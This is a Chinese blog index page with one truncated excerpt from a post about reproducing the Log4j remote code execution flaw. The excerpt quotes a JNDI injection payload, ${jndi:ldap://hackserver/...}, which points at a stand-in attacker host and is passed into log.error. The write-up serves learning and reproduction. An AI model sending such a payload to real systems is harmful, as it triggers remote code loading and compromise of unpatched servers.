会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Y0!0
博客园
首页
新随笔
新文章
联系
订阅
管理
2021年12月15日
log4j-rce复现
摘要: 声明:没研究过Java漏洞,有错误的地方一定要告诉我!!原理我也没有继续跟。 01 分析 师傅带着理了一遍,思路清晰了。 一句话总结就是:让引用了log4j的漏洞类,然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ,就会通过动态的远程
阅读全文
posted @ 2021-12-15 12:20 Y0!0
阅读(532)
评论(0)
推荐(0)